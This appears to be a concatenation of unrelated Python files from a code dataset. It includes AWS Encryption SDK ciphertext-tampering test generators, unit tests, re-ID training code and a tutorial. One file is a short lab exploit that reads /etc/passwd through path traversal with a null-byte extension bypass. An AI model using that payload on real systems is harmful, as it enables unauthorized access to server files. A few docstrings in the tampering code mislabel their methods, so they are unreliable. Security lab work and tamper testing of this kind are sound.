def from_values_spec(cls, values_spec):
"""Load from a tampering parameters specification"""
return ChangeEDKProviderInfoTamperingMethod(values_spec)
# pylint: disable=R0201
def run_scenario_with_tampering(self, ciphertext_writer, generation_scenario, _plaintext_uri):
"""
Run a given scenario, tampering with the input or the result.
return: a list of (ciphertext, result) pairs.
"""
master_key_provider = generation_scenario.encryption_scenario.master_key_provider_fn()
# Use a caching CMM to avoid generating a new data key every time.
cache = LocalCryptoMaterialsCache(10)
caching_cmm = CachingCryptoMaterialsManager(
master_key_provider=master_key_provider,
cache=cache,
max_age=60.0,
max_messages_encrypted=100,
)
return [
self.run_scenario_with_new_provider_info(
ciphertext_writer, generation_scenario, caching_cmm, new_provider_info
)
for new_provider_info in self.new_provider_infos
]
def run_scenario_with_new_provider_info(
self, ciphertext_writer, generation_scenario, materials_manager, new_provider_info
):
"""Run with tampering for a specific new provider info value"""
tampering_materials_manager = ProviderInfoChangingCryptoMaterialsManager(materials_manager, new_provider_info)
ciphertext_to_decrypt = generation_scenario.encryption_scenario.run(tampering_materials_manager)
expected_result = MessageDecryptionTestResult.expect_error(
"Incorrect encrypted data key provider info: " + new_provider_info
)
return generation_scenario.decryption_test_scenario_pair(
ciphertext_writer, ciphertext_to_decrypt, expected_result
)
class ProviderInfoChangingCryptoMaterialsManager(CryptoMaterialsManager):
"""
Custom CMM that modifies the provider info field on EDKS.
THIS IS ONLY USED TO CREATE INVALID MESSAGES and should never be used in
production!
"""
wrapped_cmm = attr.ib(validator=attr.validators.instance_of(CryptoMaterialsManager))
new_provider_info = attr.ib(validator=attr.validators.instance_of(six.string_types))
def __init__(self, materials_manager, new_provider_info):
"""Create a new CMM that wraps a the given CMM."""
self.wrapped_cmm = materials_manager
self.new_provider_info = new_provider_info
def get_encryption_materials(self, request):
"""
Request materials from the wrapped CMM, and then change the provider info
on each EDK.
"""
result = self.wrapped_cmm.get_encryption_materials(request)
for encrypted_data_key in result.encrypted_data_keys:
encrypted_data_key.key_provider.key_info = self.new_provider_info
return result
def decrypt_materials(self, request):
"""Thunks to the wrapped CMM"""
return self.wrapped_cmm.decrypt_materials(request)
BITS_PER_BYTE = 8
class TruncateTamperingMethod(TamperingMethod):
"""Tampering method that truncates a good message at every byte (except zero)."""
# pylint: disable=R0201
def run_scenario_with_tampering(self, ciphertext_writer, generation_scenario, _plaintext_uri):
"""
Run a given scenario, tampering with the input or the result.
return: a list of (ciphertext, result) pairs.
"""
ciphertext_to_decrypt = generation_scenario.encryption_scenario.run()
return [
generation_scenario.decryption_test_scenario_pair(
ciphertext_writer,
TruncateTamperingMethod.flip_bit(ciphertext_to_decrypt, bit),
MessageDecryptionTestResult.expect_error("Bit {} flipped".format(bit)),
)
for bit in range(0, len(ciphertext_to_decrypt) * BITS_PER_BYTE)
]
@classmethod
def flip_bit(cls, ciphertext, bit):
"""Flip only the given bit in the given ciphertext"""
byte_index, bit_index = divmod(bit, BITS_PER_BYTE)
result = bytearray(ciphertext)
result[byte_index] ^= 1 << (BITS_PER_BYTE - bit_index - 1)
return bytes(result)
class MutateTamperingMethod(TamperingMethod):
"""Tampering method that produces a message with a single bit flipped, for every possible bit."""
# pylint: disable=R0201
def run_scenario_with_tampering(self, ciphertext_writer, generation_scenario, _plaintext_uri):
"""
Run a given scenario, tampering with the input or the result.
return: a list of (ciphertext, result) pairs.
"""
ciphertext_to_decrypt = generation_scenario.encryption_scenario.run()
return [
generation_scenario.decryption_test_scenario_pair(
ciphertext_writer,
ciphertext_to_decrypt[0:length],
MessageDecryptionTestResult.expect_error("Truncated at byte {}".format(length)),
)
for length in range(1, len(ciphertext_to_decrypt))
]
class HalfSigningTamperingMethod(TamperingMethod):
"""Tampering method that changes the provider info on all EDKs."""
# pylint: disable=R0201
def run_scenario_with_tampering(self, ciphertext_writer, generation_scenario, _plaintext_uri):
"""
Run a given scenario, tampering with the input or the result.
return: a list of (ciphertext, result) pairs.
"""
tampering_materials_manager = HalfSigningCryptoMaterialsManager(
generation_scenario.encryption_scenario.master_key_provider_fn()
)
ciphertext_to_decrypt = generation_scenario.encryption_scenario.run(tampering_materials_manager)
expected_result = MessageDecryptionTestResult.expect_error(
"Unsigned message using a data key with a public key"
)
return [
generation_scenario.decryption_test_scenario_pair(ciphertext_writer, ciphertext_to_decrypt, expected_result)
]
class HalfSigningCryptoMaterialsManager(CryptoMaterialsManager):
"""
Custom CMM that generates materials for an unsigned algorithm suite
that includes the "aws-crypto-public-key" encryption context.
THIS IS ONLY USED TO CREATE INVALID MESSAGES and should never be used in
production! It is imitating what a malicious decryptor without encryption
permissions might do, to attempt to forge an unsigned message from a decrypted
signed message, and therefore this is an important case for ESDKs to reject.
"""
wrapped_default_cmm = attr.ib(validator=attr.validators.instance_of(CryptoMaterialsManager))
def __init__(self, master_key_provider):
"""
Create a new CMM that wraps a new DefaultCryptoMaterialsManager
based on the given master key provider.
"""
self.wrapped_default_cmm = DefaultCryptoMaterialsManager(master_key_provider)
def get_encryption_materials(self, request):
"""
Generate half-signing materials by requesting signing materials
from the wrapped default CMM, and then changing the algorithm suite
and removing the signing key from teh result.
"""
if request.algorithm == AlgorithmSuite.AES_256_GCM_HKDF_SHA512_COMMIT_KEY:
signing_request = copy(request)
signing_request.algorithm = AlgorithmSuite.AES_256_GCM_HKDF_SHA512_COMMIT_KEY_ECDSA_P384
result = self.wrapped_default_cmm.get_encryption_materials(signing_request)
result.algorithm = request.algorithm
result.signing_key = None
return result
raise NotImplementedError(
"The half-sign tampering method is only supported on the "
"AES_256_GCM_HKDF_SHA512_COMMIT_KEY algorithm suite."
)
def decrypt_materials(self, request):
"""Thunks to the wrapped default CMM"""
return self.wrapped_default_cmm.decrypt_materials(request)
@attr.s
class MessageDecryptionTestScenarioGenerator(object):
# pylint: disable=too-many-instance-attributes
"""Data class for a single full message decrypt test scenario.
Handles serialization and deserialization to and from manifest specs.
:param MessageEncryptionTestScenario encryption_scenario: Encryption parameters
:param tampering_method: Optional method used to tamper with the ciphertext
:type tampering_method: :class:`TamperingMethod`
:param decryption_method:
:param decryption_master_key_specs: Iterable of master key specifications
:type decryption_master_key_specs: iterable of :class:`MasterKeySpec`
:param Callable decryption_master_key_provider_fn:
:param result:
"""
encryption_scenario = attr.ib(validator=attr.validators.instance_of(MessageEncryptionTestScenario))
tampering_method = attr.ib(validator=attr.validators.optional(attr.validators.instance_of(TamperingMethod)))
decryption_method = attr.ib(validator=attr.validators.optional(attr.validators.instance_of(DecryptionMethod)))
decryption_master_key_specs = attr.ib(validator=iterable_validator(list, MasterKeySpec))
decryption_master_key_provider_fn = attr.ib(validator=attr.validators.is_callable())
result = attr.ib(validator=attr.validators.optional(attr.validators.instance_of(MessageDecryptionTestResult)))
@classmethod
def from_scenario(cls, scenario, keys, plaintexts):
"""Load from a scenario specification.
:param dict scenario: Scenario specification JSON
:param KeysManifest keys: Loaded keys
:param dict plaintexts: Mapping of plaintext names to plaintext values
:return: Loaded test scenario
:rtype: MessageDecryptionTestScenarioGenerator
"""
encryption_scenario_spec = scenario["encryption-scenario"]
encryption_scenario = MessageEncryptionTestScenario.from_scenario(encryption_scenario_spec, keys, plaintexts)
tampering = scenario.get("tampering")
tampering_method = TamperingMethod.from_tampering_spec(tampering)
decryption_method_spec = scenario.get("decryption-method")
decryption_method = DecryptionMethod(decryption_method_spec) if decryption_method_spec else None
if "decryption-master-keys" in scenario:
decryption_master_key_specs = [
MasterKeySpec.from_scenario(spec) for spec in scenario["decryption-master-keys"]
]
def decryption_master_key_provider_fn():
return master_key_provider_from_master_key_specs(keys, decryption_master_key_specs)
else:
decryption_master_key_specs = encryption_scenario.master_key_specs
decryption_master_key_provider_fn = encryption_scenario.master_key_provider_fn
result_spec = scenario.get("result")
result = MessageDecryptionTestResult.from_result_spec(result_spec, None) if result_spec else None
return cls(
encryption_scenario=encryption_scenario,
tampering_method=tampering_method,
decryption_method=decryption_method,
decryption_master_key_specs=decryption_master_key_specs,
decryption_master_key_provider_fn=decryption_master_key_provider_fn,
result=result,
)
def run(self, ciphertext_writer, plaintext_uri):
"""Run this scenario, writing the resulting ciphertext with ``ciphertext_writer`` and returning
a :class:`MessageDecryptionTestScenario` that describes the matching decrypt scenario.
:param callable ciphertext_writer: Callable that will write the requested named ciphertext and
return a URI locating the written data
:param str plaintext_uri: URI locating the written plaintext data for this scenario
:return: Decrypt test scenario that describes the generated scenario
:rtype: MessageDecryptionTestScenario
"""
return dict(self.tampering_method.run_scenario_with_tampering(ciphertext_writer, self, plaintext_uri))
def decryption_test_scenario_pair(self, ciphertext_writer, ciphertext_to_decrypt, expected_result):
"""Create a new (name, decryption scenario) pair"""
ciphertext_name = str(uuid.uuid4())
ciphertext_uri = ciphertext_writer(ciphertext_name, ciphertext_to_decrypt)
return (
ciphertext_name,
MessageDecryptionTestScenario(
ciphertext_uri=ciphertext_uri,
ciphertext=ciphertext_to_decrypt,
master_key_specs=self.decryption_master_key_specs,
master_key_provider_fn=self.decryption_master_key_provider_fn,
decryption_method=self.decryption_method,
result=expected_result,
),
)
@attr.s
class MessageDecryptionGenerationManifest(object):
"""AWS Encryption SDK Decryption Message Generation manifest handler.
Described in AWS Crypto Tools Test Vector Framework feature #0006 AWS Encryption SDK Decrypt Message Generation.
:param int version: Version of this manifest
:param KeysManifest keys: Loaded keys
:param dict plaintexts: Mapping of plaintext names to plaintext values
:param dict tests: Mapping of test scenario names to :class:`MessageDecryptionGenerationManifest`s
"""
version = attr.ib(validator=membership_validator(SUPPORTED_VERSIONS))
keys = attr.ib(validator=attr.validators.instance_of(KeysManifest))
plaintexts = attr.ib(validator=dictionary_validator(six.string_types, six.binary_type))
tests = attr.ib(validator=dictionary_validator(six.string_types, MessageDecryptionTestScenarioGenerator))
type_name = "awses-decrypt-generate"
@staticmethod
def _generate_plaintexts(plaintexts_specs):
# type: (PLAINTEXTS_SPEC) -> Dict[str, bytes]
"""Generate required plaintext values.
:param dict plaintexts_specs: Mapping of plaintext name to size in bytes
:return: Mapping of plaintext name to randomly generated bytes
:rtype: dict
"""
return {name: os.urandom(size) for name, size in plaintexts_specs.items()}
@classmethod
def from_file(cls, input_file):
# type: (IO) -> MessageDecryptionGenerationManifest
"""Load from a file containing a full message encrypt manifest.
:param file input_file: File object for file containing JSON manifest
:return: Loaded manifest
:rtype: MessageEncryptionManifest
"""
raw_manifest = json.load(input_file)
validate_manifest_type(
type_name=cls.type_name, manifest_version=raw_manifest["manifest"], supported_versions=SUPPORTED_VERSIONS
)
parent_dir = os.path.abspath(os.path.dirname(input_file.name))
reader = file_reader(parent_dir)
raw_keys_manifest = json.loads(reader(raw_manifest["keys"]).decode(ENCODING))
keys = KeysManifest.from_manifest_spec(raw_keys_manifest)
plaintexts = cls._generate_plaintexts(raw_manifest["plaintexts"])
tests = {}
for name, scenario in raw_manifest["tests"].items():
try:
tests[name] = MessageDecryptionTestScenarioGenerator.from_scenario(
scenario=scenario, keys=keys, plaintexts=plaintexts
)
except NotImplementedError:
continue
return cls(version=raw_manifest["manifest"]["version"], keys=keys, plaintexts=plaintexts, tests=tests)
def run_and_write_to_dir(self, target_directory, json_indent=None):
# type: (str, Optional[int]) -> None
"""Process all known encrypt test scenarios and write the resulting data and manifests to disk.
:param str target_directory: Directory in which to write all output
:param int json_indent: Number of spaces to indent JSON files (optional: default is to write minified)
"""
root_dir = os.path.abspath(target_directory)
root_writer = file_writer(root_dir)
root_writer("keys.json", json.dumps(self.keys.manifest_spec, indent=json_indent).encode(ENCODING))
plaintext_writer = file_writer(os.path.join(root_dir, "plaintexts"))
plaintext_uris = {name: plaintext_writer(name, plaintext) for name, plaintext in self.plaintexts.items()}
ciphertext_writer = file_writer(os.path.join(root_dir, "ciphertexts"))
test_scenarios = {
decrypt_scenario_name: decrypt_scenario
for name, scenario in self.tests.items()
for decrypt_scenario_name, decrypt_scenario in scenario.run(
ciphertext_writer, plaintext_uris[scenario.encryption_scenario.plaintext_name]
).items()
}
decrypt_manifest = MessageDecryptionManifest(
keys_uri="file://keys.json", keys=self.keys, test_scenarios=test_scenarios
)
root_writer("manifest.json", json.dumps(decrypt_manifest.manifest_spec, indent=json_indent).encode(ENCODING))
| 1.554688 | 2 |
acceptance/test/TestStartStopFeature.py | ismacaulay/qtcwatchdog | 0 | 1252 | from acceptance.harness.acceptance_test import WatchdogAcceptanceTest
class TestStartStopFeature(WatchdogAcceptanceTest):
def test_willStartObserverWhenWatchdogStarted(self):
self.create_and_start_watchdog()
self.assertTrue(self.fs_observer.running)
def test_willStopObserverWhenWatchdogStopped(self):
self.create_and_start_watchdog()
self.watchdog.stop()
self.assertFalse(self.fs_observer.running)
def test_willJoinObserverThreadWhenWatchdogStopped(self):
self.create_and_start_watchdog()
self.watchdog.stop()
self.assertTrue(self.fs_observer.joined)
| 2.03125 | 2 |
neural_spline_flows/nde/transforms/transform_test.py | VincentStimper/nsf | 0 | 1253 | import torch
import torchtestcase
from neural_spline_flows.nde.transforms import base
class TransformTest(torchtestcase.TorchTestCase):
"""Base test for all transforms."""
def assert_tensor_is_good(self, tensor, shape=None):
self.assertIsInstance(tensor, torch.Tensor)
self.assertFalse(torch.isnan(tensor).any())
self.assertFalse(torch.isinf(tensor).any())
if shape is not None:
self.assertEqual(tensor.shape, torch.Size(shape))
def assert_forward_inverse_are_consistent(self, transform, inputs):
inverse = base.InverseTransform(transform)
identity = base.CompositeTransform([inverse, transform])
outputs, logabsdet = identity(inputs)
self.assert_tensor_is_good(outputs, shape=inputs.shape)
self.assert_tensor_is_good(logabsdet, shape=inputs.shape[:1])
self.assertEqual(outputs, inputs)
self.assertEqual(logabsdet, torch.zeros(inputs.shape[:1]))
def assertNotEqual(self, first, second, msg=None):
if ((self._eps and (first - second).abs().max().item() < self._eps) or
(not self._eps and torch.equal(first, second))):
self._fail_with_message(msg, "The tensors are _not_ different!")
| 2.546875 | 3 |
directory-traversal/validate-file-extension-null-byte-bypass.py | brandonaltermatt/penetration-testing-scripts | 0 | 1254 | <filename>directory-traversal/validate-file-extension-null-byte-bypass.py
"""
https://portswigger.net/web-security/file-path-traversal/lab-validate-file-extension-null-byte-bypass
"""
import sys
import requests
site = sys.argv[1]
if 'https://' in site:
site = site.rstrip('/').lstrip('https://')
url = f'''https://{site}/image?filename=../../../etc/passwd%00.png'''
s = requests.Session()
resp = s.get(url)
print(resp.text) | 2.859375 | 3 |
atmpro1_vsm2.py | joselynzhao/One-shot-Person-Re-ID-ATM | 3 | 1255 | <reponame>joselynzhao/One-shot-Person-Re-ID-ATM<gh_stars>1-10
#!/usr/bin/python3.6
# -*- coding: utf-8 -*-
# @Time : 2020/9/3 上午11:03
# @Author : Joselynzhao
# @Email : <EMAIL>
# @File : atmpro1_vsm2.py
# @Software: PyCharm
# @Desc :
#!/usr/bin/python3.6
# -*- coding: utf-8 -*-
# @Time : 2020/9/1 下午7:07
# @Author : Joselynzhao
# @Email : <EMAIL>
# @File : atmpro1_vsm.py
# @Software: PyCharm
# @Desc :
#!/usr/bin/python3.6
# -*- coding: utf-8 -*-
# @Time : 2020/8/26 下午8:26
# @Author : Joselynzhao
# @Email : <EMAIL>
# @File : atmpro1.py
# @Software: PyCharm
# @Desc :
from my_reid.eug import *
from my_reid import datasets
from my_reid import models
import numpy as np
import torch
import argparse
import os
import warnings
warnings.filterwarnings("ignore")
from my_reid.utils.logging import Logger
import os.path as osp
import sys
from torch.backends import cudnn
from my_reid.utils.serialization import load_checkpoint
from torch import nn
import time
import pickle
import torch.distributed as dist
from torch.nn.parallel import DistributedDataParallel as DDP
from torch.utils.data.distributed import DistributedSampler
from pathlib import Path
def resume(savepath):
import re
pattern = re.compile(r'step_(\d+)\.ckpt')
start_step = -1
ckpt_file = ""
# find start step
files = os.listdir(savepath)
files.sort()
for filename in files:
try:
iter_ = int(pattern.search(filename).groups()[0])
print(iter_)
if iter_ > start_step:
start_step = iter_
ckpt_file = osp.join(savepath, filename)
except:
continue
# if need resume
if start_step >= 0:
print("continued from iter step", start_step)
else:
print("resume failed", start_step, files)
return start_step, ckpt_file
def main(args):
father = Path('/mnt/')
if father.exists(): # 是在服务器上
data_dir = Path('/mnt/share/datasets/RE-ID/data') # 服务器
logs_dir = Path('/mnt/home/{}'.format(args.log_name)) # 服务器
else: #本地
data_dir = Path('/home/joselyn/workspace/ATM_SERIES/data') # 本地跑用这个
logs_dir = Path('/home/joselyn/workspace/ATM_SERIES/{}'.format(args.log_name)) # 本地跑用这个
cudnn.benchmark = True
cudnn.enabled = True
save_path = os.path.join(logs_dir, args.dataset, args.exp_name, args.exp_order) # 到编号位置.
total_step = 100 // args.EF + 1
sys.stdout = Logger(osp.join(save_path, 'log' + str(args.EF) + time.strftime(".%m_%d_%H:%M:%S") + '.txt'))
dataf_file = open(osp.join(save_path, 'dataf.txt'), 'a') # 保存性能数据. #特征空间中的性能问题.
data_file = open(osp.join(save_path, 'data.txt'), 'a') # 保存性能数据. #特征空间中的性能问题.
kf_file = open(osp.join(save_path,'kf.txt'),'a')
# 数据格式为 label_pre_r, select_pre_r,label_pre_t, select_pre_t ,加上了了tagper的数据.
tagper_path = osp.join(save_path,'tagper') #tagper存储路径.
if not Path(tagper_path).exists():
os.mkdir(tagper_path)
'''# 记录配置信息 和路径'''
print('-'*20+'config_info'+'-'*20)
config_file = open(osp.join(save_path, 'config.txt'), 'w')
config_info = str(args).split('(')[1].strip(')').split(',')
config_info.sort()
for one in config_info:
key,value=map(str,one.split('='))
config_file.write(key.strip()+'='+value.strip('\'')+'\n')
print(key.strip()+'='+value.strip('\''))
config_file.write('save_path='+save_path)
print('save_path='+save_path)
print('-' * 20 + 'config_info' + '-' * 20)
config_file.close()
train_time_file = open(osp.join(save_path, 'time.txt'), 'a') # 只记录训练所需要的时间.
# 数据格式为 step_time total_time.
total_time = 0
# get all the labeled and unlabeled data for training
dataset_all = datasets.create(args.dataset, osp.join(data_dir, args.dataset))
num_all_examples = len(dataset_all.train)
l_data, u_data = get_init_shot_in_cam1(dataset_all,
load_path="./examples/{}_init_{}.pickle".format(dataset_all.name, args.init),
init=args.init)
resume_step, ckpt_file = -1, ''
if args.resume:
resume_step, ckpt_file = resume(save_path)
# initial the EUG algorithm
eug = EUG(batch_size=args.batch_size, num_classes=dataset_all.num_train_ids,
dataset=dataset_all, l_data=l_data, u_data=u_data, save_path=save_path, max_frames=args.max_frames,
embeding_fea_size=args.fea, momentum=args.momentum, lamda=args.lamda)
tagper = EUG(batch_size=args.batch_size, num_classes=dataset_all.num_train_ids,
dataset=dataset_all, l_data=l_data, u_data=u_data, save_path=tagper_path,
max_frames=args.max_frames,
embeding_fea_size=args.fea, momentum=args.momentum, lamda=args.lamda)
new_train_data = l_data
unselected_data = u_data
iter_mode = 2 #迭代模式,确定是否训练tagper
for step in range(total_step):
# for resume
if step < resume_step:
continue
ratio = (step + 1) * args.EF / 100
ratio_t = (step+1+args.t) * args.EF /100
nums_to_select = int(len(u_data) * ratio)
nums_to_select_tagper = int(len(u_data) * ratio_t)
if nums_to_select >= len(u_data):
break
#args.vsm_lambda的衰减 0.5 - 0
vsm_lambda = args.vsm_lambda*step/(1-(total_step/2)) +args.vsm_lambda
vsm_lambda +=1
print("Runing: EF={}%, step {}:\t Nums_to_be_select {} \t Ritio \t Logs-dir {}".format(
args.EF, step, nums_to_select, ratio, save_path))
# train the model or load ckpt
start_time = time.time()
print("training reid model")
eug.train(new_train_data, unselected_data, step, loss=args.loss, epochs=args.epochs, step_size=args.step_size,
init_lr=0.1) if step != resume_step else eug.resume(ckpt_file, step)
# 只对eug进行性能评估
# mAP, rank1, rank5, rank10, rank20 = 0, 0, 0, 0, 0
mAP, rank1, rank5, rank10, rank20 = eug.evaluate(dataset_all.query, dataset_all.gallery)
# 把数据写到data文件里.
data_file.write('{} {:.2%} {:.2%} {:.2%} {:.2%} {:.2%}\n'.format(step, mAP, rank1, rank5, rank10, rank20))
pred_y, pred_score,label_pre,dists= eug.estimate_label_vsm()
selected_idx = eug.select_top_data_vsm2(pred_score, dists,args.topk,vsm_lambda,min(nums_to_select_tagper,len(u_data)-50) if iter_mode==2 else min(nums_to_select,len(u_data))) #直接翻两倍取数据. -50个样本,保证unselected_data数量不为0
new_train_data, unselected_data, select_pre= eug.generate_new_train_data(selected_idx, pred_y)
raw_label_pre, raw_select_pre = label_pre,select_pre
t_label_pre,t_select_pre = 0,0
raw_select_pre_t = 0
# label_pre_t,select_pre_t=0,0
if iter_mode==2:
raw_select_pre_t = raw_select_pre
print("training tagper model")
selected_idx = eug.select_top_data_vsm2(pred_score,dists,args.topk,vsm_lambda, min(nums_to_select, len(u_data)))
_, _, raw_select_pre = eug.generate_new_train_data(selected_idx, pred_y)
# kf_file.write('{} {:.2%} {:.2%}'.format(step, label_pre, select_pre))
tagper.resume(osp.join(save_path,'step_{}.ckpt'.format(step)),step)
tagper.train(new_train_data, unselected_data, step, loss=args.loss, epochs=args.epochs, step_size=args.step_size, init_lr=0.1)
pred_y, pred_score, label_pre,dists= tagper.estimate_label_vsm()
selected_idx = tagper.select_top_data_vsm2(pred_score,dists,args.topk,vsm_lambda,min(nums_to_select,len(u_data))) # 采样目标数量
new_train_data, unselected_data, select_pre= tagper.generate_new_train_data(selected_idx, pred_y)
t_label_pre,t_select_pre = label_pre,select_pre
label_pre,select_pre = t_label_pre,t_select_pre
if nums_to_select_tagper >=len(u_data):
iter_mode=1 #切换模式
print('tagper is stop')
else: #mode = 1
# raw_select_pre = raw_select_pre_t
# raw_select_pre_t = 0
label_pre,select_pre = raw_label_pre,raw_select_pre
end_time = time.time()
step_time = end_time - start_time
total_time = step_time + total_time
train_time_file.write('{} {:.6} {:.6}\n'.format(step, step_time, total_time))
kf_file.write('{} {} {} {:.2%} {:.2%} {:.2%} {:.2%} {:.2%}\n'.format(step,nums_to_select,nums_to_select_tagper,raw_label_pre,raw_select_pre,raw_select_pre_t,t_label_pre,t_select_pre))
dataf_file.write(
'{} {:.2%} {:.2%}\n'.format(step, label_pre, select_pre))
dataf_file.close()
train_time_file.close()
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Progressive Learning for One-Example re-ID')
parser.add_argument('-d', '--dataset', type=str, default='mars',
choices=datasets.names())
parser.add_argument('-b', '--batch-size', type=int, default=16)
parser.add_argument('-f', '--fea', type=int, default=1024)
parser.add_argument('--EF', type=int, default=10)
parser.add_argument('--t', type=float, default=2) #不再tagper采样的倍率, 而是表示跨多少个step采样.
parser.add_argument('--exp_order', type=str, default='0')
parser.add_argument('--exp_name', type=str, default='atm')
parser.add_argument('--exp_aim', type=str, default='for paper')
parser.add_argument('--run_file',type=str,default='train.py')
parser.add_argument('--log_name',type=str,default='pl_logs')
parser.add_argument('--topk',type=int,default=2)
parser.add_argument('--vsm_lambda',type=float,default=0.5)
parser.add_argument('--resume', type=str, default='Yes')
parser.add_argument('--max_frames', type=int, default=900)
parser.add_argument('--loss', type=str, default='ExLoss', choices=['CrossEntropyLoss', 'ExLoss'])
parser.add_argument('--init', type=float, default=-1)
parser.add_argument('-m', '--momentum', type=float, default=0.5)
parser.add_argument('-e', '--epochs', type=int, default=70)
parser.add_argument('-s', '--step_size', type=int, default=55)
parser.add_argument('--lamda', type=float, default=0.5)
main(parser.parse_args())
| 2.09375 | 2 |
consumer/tests/test__index_handler.py | eHealthAfrica/aether-elasticsearch-consumer | 0 | 1256 | <filename>consumer/tests/test__index_handler.py<gh_stars>0
# Copyright (C) 2019 by eHealth Africa : http://www.eHealthAfrica.org
#
# See the NOTICE file distributed with this work for additional information
# regarding copyright ownership.
#
# Licensed under the Apache License, Version 2.0 (the 'License');
# you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import json
import pytest
import requests
import responses
from time import sleep
from elasticsearch.exceptions import NotFoundError
from aet.logger import get_logger
from app import index_handler
from . import * # noqa # fixtures
LOG = get_logger('TEST-IDX')
# convenience function for jsonpath
@responses.activate
@pytest.mark.unit
def test__handle_http():
responses.add(
responses.GET,
'http://bad-url',
json={'error': 'not found'},
status=404
)
res = requests.get('http://bad-url')
with pytest.raises(requests.exceptions.HTTPError):
index_handler.handle_http(res)
@pytest.mark.unit
def test__get_es_index_from_autoconfig(SubscriptionDefinition, ComplexSchema):
es_options = SubscriptionDefinition.get('es_options')
tenant = 'dev'
name = 'a-topic'
alias = es_options.get('alias_name')
index = index_handler.get_es_index_from_subscription(
es_options, name, tenant, ComplexSchema
)
LOG.debug(json.dumps(index, indent=2))
assert(first('$.name', index) == f'{tenant}.{name}')
geo_name = es_options['geo_point_name']
assert(first(
f'$.body.mappings._doc.properties.{geo_name}', index) is not None)
@pytest.mark.unit
def test__get_index_for_topic(SubscriptionDefinition, ComplexSchema):
name = 'Person'
es_options = SubscriptionDefinition.get('es_options')
geo_name = es_options.get('geo_point_name')
auto_ts = es_options.get('auto_timestamp')
index = index_handler.get_index_for_topic(name, geo_name, auto_ts, ComplexSchema)
index = index.get('mappings', None)
assert(len(index) == 1)
assert(first('$._doc', index) is not None)
assert(first(f'$._doc.properties.{geo_name}.type', index) == 'geo_point')
assert(first(f'$._doc._meta.aet_auto_ts', index) == auto_ts)
@pytest.mark.unit
def test__get_es_types_from_schema(ComplexSchema):
res = index_handler.get_es_types_from_schema(ComplexSchema)
assert(first('$.beds.type', res) == 'integer')
assert(first('$.username.type', res) == 'keyword')
assert(first('$._start.type', res) == 'date')
assert(first('$.geometry.type', res) == 'object')
assert(first('$.meta.type', res) == 'object')
assert(first('$.mandatory_date.type', res) == 'date')
assert(first('$.mandatory_date.format', res) == 'date')
assert(first('$.optional_dt.type', res) == 'date')
assert(first('$.optional_dt.format', res) == 'epoch_millis')
assert(len(list(res.keys())) == 55)
@pytest.mark.unit
def test__make_kibana_index(AutoGenSchema):
name = 'kibana-index-name'
res = index_handler.make_kibana_index(name, AutoGenSchema)
assert(res.get('attributes', {}).get('title') == name)
@pytest.mark.unit
def test___find_timestamp(ComplexSchema):
result = index_handler._find_timestamp(ComplexSchema)
assert(result == 'timestamp')
@pytest.mark.unit
def test___format_lookups(ComplexSchema):
formatted = index_handler._format_lookups(ComplexSchema)
assert(
json.dumps(
formatted.get(
'operational_status'), sort_keys=True) ==
json.dumps(
SAMPLE_FIELD_LOOKUP.get(
'operational_status'), sort_keys=True)
)
@pytest.mark.unit
def test___format_single_lookup(ComplexSchema):
matching = ComplexSchema.get_node('MySurvey.operational_status')
res = index_handler._format_single_lookup(matching)
assert(
json.dumps(res, sort_keys=True) ==
json.dumps(SAMPLE_FIELD_LOOKUP.get(
'operational_status'), sort_keys=True)
)
@pytest.mark.unit
def test__get_alias_from_namespace():
namespace = 'A_Gather_Form_V1'
res = index_handler.get_alias_from_namespace(namespace)
assert(res == 'A_Gather_Form')
@pytest.mark.integration
def test__update_es_index(TestElasticsearch, PolySchemaA, PolySchemaB):
# register index with mapping
es = TestElasticsearch.get_session()
doc_id = 'poly-test-doc'
doc = {
'id': doc_id,
'poly': '1001'
}
index_a = index_handler.get_es_index_from_subscription(
es_options={},
name='test1',
tenant='test-tenant',
schema=PolySchemaA
)
index_name = index_a.get('name')
index_b = index_handler.get_es_index_from_subscription(
es_options={},
name='test1',
tenant='test-tenant',
schema=PolySchemaB
)
alias = index_handler.get_alias_from_namespace(PolySchemaA.name)
# register schema A
index_handler.update_es_index(es, index_a, 'test-tenant', alias)
# put doc
es.create(
index=index_name,
id=doc_id,
body=doc
)
es.indices.refresh(index=index_name)
res = es.search(index=index_name, body={
"query": {"term": {"poly": "1001"}}
})
assert(res.get('hits').get('max_score') < 1.0) # find imperfect by string
res = es.search(index=index_name, body={
"query": {"term": {"poly": 1001}}
})
assert(res.get('hits').get('max_score') < 1.0) # find imperfect by string
# migrate to schema B
index_handler.update_es_index(es, index_b, 'test-tenant', alias)
es.indices.refresh(index=index_name)
res = es.search(index=index_name, body={
"query": {"term": {"poly": "1001"}}
})
assert(res.get('hits').get('max_score') == 1.0) # find by string
res = es.search(index=index_name, body={
"query": {"term": {"poly": 1001}}
})
assert(res.get('hits').get('max_score') == 1.0) # find by int
| 1.664063 | 2 |
plans/config.py | datopian/plans | 3 | 1257 | import os
database_url = os.environ.get('DATABASE_URL')
| 1.359375 | 1 |
Assignment Day 2 .py | ShubhamKahlon57/Letsupgrade-python-Batch-7 | 0 | 1258 | #!/usr/bin/env python
# coding: utf-8
# In[ ]:
#List and function
# In[6]:
# empty list
my_list = []
# list of integers
my_list = [1, 2, 3]
# list with mixed data types
my_list = [1, "Hello", 3.4]
# In[7]:
# nested list
my_list = ["mouse", [8, 4, 6], ['a']]
# In[11]:
# List indexing
my_list = ['p', 'r', 'o', 'b', 'e']
# Output: p
print(my_list[0])
# Output: o
print(my_list[2])
# Output: e
print(my_list[4])
# Nested List
n_list = ["Happy", [2, 0, 1, 5]]
# Nested indexing
print(n_list[0][1])
print(n_list[1][3])
# Error! Only integer can be used for indexing
print(my_list[4])
# In[9]:
# Appending and Extending lists in Python
odd = [1, 3, 5]
odd.append(7)
print(odd)
odd.extend([9, 11, 13])
print(odd)
# In[13]:
# Deleting list items
my_list = ['p', 'r', 'o', 'b', 'l', 'e', 'm']
# delete one item
del my_list[2]
print(my_list)
# delete multiple items
del my_list[1:5]
print(my_list)
# delete entire list
del my_list
# In[14]:
# Appending and Extending lists in Python
odd = [1, 3, 5]
odd.append(7)
print(odd)
odd.extend([9, 11, 13])
print(odd)
# In[15]:
#Dictionary and function
# In[18]:
y_dict = {}
# dictionary with integer keys
